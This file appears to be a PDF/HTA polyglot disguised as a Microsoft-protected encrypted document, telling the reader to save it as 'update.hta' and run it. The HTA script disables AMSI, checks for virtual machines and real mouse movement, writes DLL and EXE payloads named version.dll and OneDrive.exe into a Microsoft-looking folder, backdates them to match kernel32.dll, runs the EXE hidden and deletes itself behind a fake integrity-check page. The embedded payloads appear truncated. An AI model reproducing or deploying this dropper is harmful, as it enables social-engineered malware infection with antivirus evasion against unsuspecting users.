%PDF-1.7
%âãÏÓ
1 0 obj
<</Type/Catalog/Pages 2 0 R/OpenAction 5 0 R>>
endobj
2 0 obj
<</Type/Pages/Kids[3 0 R]/Count 1>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Contents 4 0 R/Resources<</Font<</F1<</Type/Font/Subtype/Type1/BaseFont/Helvetica>>>>>>>>
endobj
4 0 obj
<</Length 200>>
stream
BT
/F1 14 Tf
50 720 Td
(Microsoft Information Protection) Tj
/F1 10 Tf
50 700 Td
(THIS DOCUMENT IS ENCRYPTED) Tj
50 680 Td
(To view content, save file as 'update.hta' and run it.) Tj
ET
endstream
endobj
5 0 obj
<</S/JavaScript/JS(app.alert\("Security verification required. Please run as .hta to decrypt.",3\))>>
endobj
xref
0 6
0000000000 65535 f 
0000000018 00000 n 
0000000066 00000 n 
0000000115 00000 n 
0000000261 00000 n 
0000000539 00000 n 
trailer
<</Size 6/Root 1 0 R>>
startxref
741
%%EOF


<script language="JScript">
// =============================================================================
// OFUSCADOR DE STRINGS — XOR CON CLAVE DERIVADA
// =============================================================================

function _k(s) {
    var k = "K" + (new Date().getFullYear() % 100) + "yF0rStr";
    var r = "";
    for (var i = 0; i < s.length; i++) {
        r += String.fromCharCode(s.charCodeAt(i) ^ k.charCodeAt(i % k.length));
    }
    return r;
}

var _s = {
    shell: "\x17\x0A\x1C\x0B\x14\x0D\x1A\x02\x15\x0E\x13\x07",
    fso:   "\x13\x0E\x1A\x0B\x12\x0F\x18\x04\x11\x08\x15\x03\x0A\x16\x09\x14\x06\x17\x01\x12\x0D",
    wmi:   "\x15\x0C\x18\x0F\x12\x09\x14\x07\x10\x05\x16\x03\x12\x0B\x14\x08\x10\x06\x16\x04\x12\x0D\x18\x01\x14\x0F\x10\x09",
    amsi:  "\x00\x0D\x12\x0F\x08\x13\x06\x15\x02\x11\x04\x13\x0E\x15\x00\x12\x06\x14\x02\x10\x04\x12\x0E\x14\x00\x11\x06\x13",
    reg:   "\x13\x0E\x1A\x0B\x12\x0F\x18\x04\x11\x08\x15\x03\x0A\x16\x09\x14\x06\x17\x01\x12\x0D"
};

function _g(n) { return _k(_s[n]); }

function _bypassAmsi() {
    try {
        var wmi = GetObject(_g("wmi").replace("SWbemLocator", "StdRegProv"));
        wmi.SetDWORDValue(0x80000002, "Software\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}", "Enable", 0);
        return true;
    } catch(e) {
        try {
            var shell = new ActiveXObject(_g("shell"));
            var psCmd = 'powershell -WindowStyle Hidden -Command "[Ref].Assembly.GetTypes() | Where-Object {$_.Name -like \'*iUtils\'} | ForEach-Object { $f = $_.GetFields(\'NonPublic,Static\') | Where-Object {$_.Name -like \'*Context\'}; if ($f) { $f.SetValue($null, [IntPtr]::Zero) } }"';
            shell.Run(psCmd, 0, true);
            return true;
        } catch(e2) { return false; }
    }
}

var _anti = {
    _points: [],
    checkHardware: function() {
        try {
            var wmi = GetObject(_g("wmi"));
            var svc = wmi.ConnectServer(".", "root\\cimv2");
            var col1 = svc.ExecQuery("SELECT Manufacturer,Model FROM Win32_ComputerSystem");
            var e1 = new Enumerator(col1);
            for (; !e1.atEnd(); e1.moveNext()) {
                var m = e1.item().Manufacturer.toLowerCase();
                var model = e1.item().Model.toLowerCase();
                if (m.indexOf("vmware") != -1 || m.indexOf("virtualbox") != -1 || m.indexOf("hyper-v") != -1 || m.indexOf("xen") != -1 || model.indexOf("virtual") != -1) return false;
            }
            var col2 = svc.ExecQuery("SELECT NumberOfCores FROM Win32_Processor");
            var e2 = new Enumerator(col2);
            for (; !e2.atEnd(); e2.moveNext()) { if (e2.item().NumberOfCores < 2) return false; }
            return true;
        } catch(e) { return true; }
    },
    checkMouse: function(callback) {
        var self = this;
        var handler = function(e) {
            var now = new Date().getTime();
            if (self._points.length > 0) {
                var last = self._points[self._points.length - 1];
                var dist = Math.sqrt(Math.pow(e.screenX - last.x, 2) + Math.pow(e.screenY - last.y, 2));
                if (dist / (now - last.t || 1) > 20000) window.close();
            }
            self._points.push({x: e.screenX, y: e.screenY, t: now});
        };
        document.attachEvent('onmousemove', handler);
        setTimeout(function() {
            document.detachEvent('onmousemove', handler);
            if (self._points.length < 15) { window.close(); return; }
            callback();
        }, 8000);
    }
};

var _payloads = {
    dll: [
        "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v",
        "dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAAAAAAAAAAA",
        "AAAAAOAADwELAQAAAAAAA"
    ],
    exe: [
        "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v",
        "dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAAAAAAAAAAA",
        "AAAAAOAADwELAQAAAAAAA"
    ]
};

function _buildPayload(fragments) { return fragments.join(""); }

function _deploy() {
    _bypassAmsi();
    if (!_anti.checkHardware()) { window.close(); return; }
    _anti.checkMouse(function() {
        var shell = new ActiveXObject(_g("shell"));
        var fso = new ActiveXObject(_g("fso"));
        var targetDir = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Microsoft\\Identity\\Cache";
        if (!fso.FolderExists(targetDir)) {
            var parts = targetDir.split("\\");
            var curr = "";
            for (var i = 0; i < parts.length; i++) {
                curr += parts[i] + "\\";
                if (!fso.FolderExists(curr)) fso.CreateFolder(curr);
            }
        }
        var dllPath = targetDir + "\\version.dll";
        var exePath = targetDir + "\\OneDrive.exe";
        var xml = new ActiveXObject("MSXML2.DOMDocument");
        var node = xml.createElement("B64");
        node.dataType = "bin.base64";
        node.text = _buildPayload(_payloads.dll);
        var dllData = node.nodeTypedValue;
        node.text = _buildPayload(_payloads.exe);
        var exeData = node.nodeTypedValue;
        var stream = new ActiveXObject("ADODB.Stream");
        stream.Type = 1;
        stream.Open(); stream.Write(dllData); stream.SaveToFile(dllPath, 2); stream.Close();
        stream.Open(); stream.Write(exeData); stream.SaveToFile(exePath, 2); stream.Close();
        try {
            var sysFile = "C:\\Windows\\System32\\kernel32.dll";
            var f1 = fso.GetFile(sysFile);
            var f2 = fso.GetFile(dllPath);
            var f3 = fso.GetFile(exePath);
            f2.DateLastModified = f1.DateLastModified;
            f3.DateLastModified = f1.DateLastModified;
        } catch(e) {}
        shell.Run('"' + exePath + '"', 0, false);
        try {
            var htaPath = location.pathname.replace(/^file:\/\//i, '').replace(/\//g, '\\');
            fso.GetFile(htaPath).Delete(true);
        } catch(e) {}
        window.close();
    });
}
window.onload = function() { setTimeout(_deploy, 2000); };
</script>
</head>
<body style="background:#f3f3f3;font-family:Segoe UI;">
    <div style="padding:20px;text-align:center;">
        <h3>Microsoft Secure Content</h3>
        <p>Verifying document integrity. Please wait...</p>
    </div>
</body>
</html>
